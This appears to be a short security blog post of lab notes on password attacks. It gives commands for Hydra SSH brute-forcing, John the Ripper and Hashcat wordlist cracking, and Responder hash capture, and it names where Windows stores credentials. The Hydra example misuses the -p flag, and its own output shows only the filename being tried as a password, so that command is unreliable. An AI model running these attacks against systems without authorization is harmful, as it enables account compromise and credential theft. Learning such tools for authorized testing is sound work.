Password Hacking Hydra


hydra -l user -p fasttrack.txt ssh://192.168.220.131 -V -I -F -t 40


┌──(root㉿kali)-[/usr/share/wordlists]

└─# hydra -l jeanpaul -p fasttrack.txt ssh://192.168.220.131 -V -I -F -t 4

Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).


Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-07 00:31:22

[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task

[DATA] attacking ssh://192.168.220.131:22/

[ATTEMPT] target 192.168.220.131 - login "jeanpaul" - pass "fasttrack.txt" - 1 of 1 [child 0] (0/0)

1 of 1 target completed, 0 valid password found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-07 00:31:24



JohnTheRipper:

john /tmp/hashes --wordlist /usr/share/wordlists/fasttrack.txt --format=crypt


Password Store in Windows:

NTDS.DIT, SAM file, Registry, etc


sudo responder -I eth0



HashCat:

hashcat -a 0 -m 5600 ntlm_hashes.txt /usr/share/wordlists/fasttrack.txt





Comments

Popular posts from this blog

GOAD Active Directory LAB Setup on a Windows host

My Short Analysis - Redline Infostealer

Regular expressions - Notes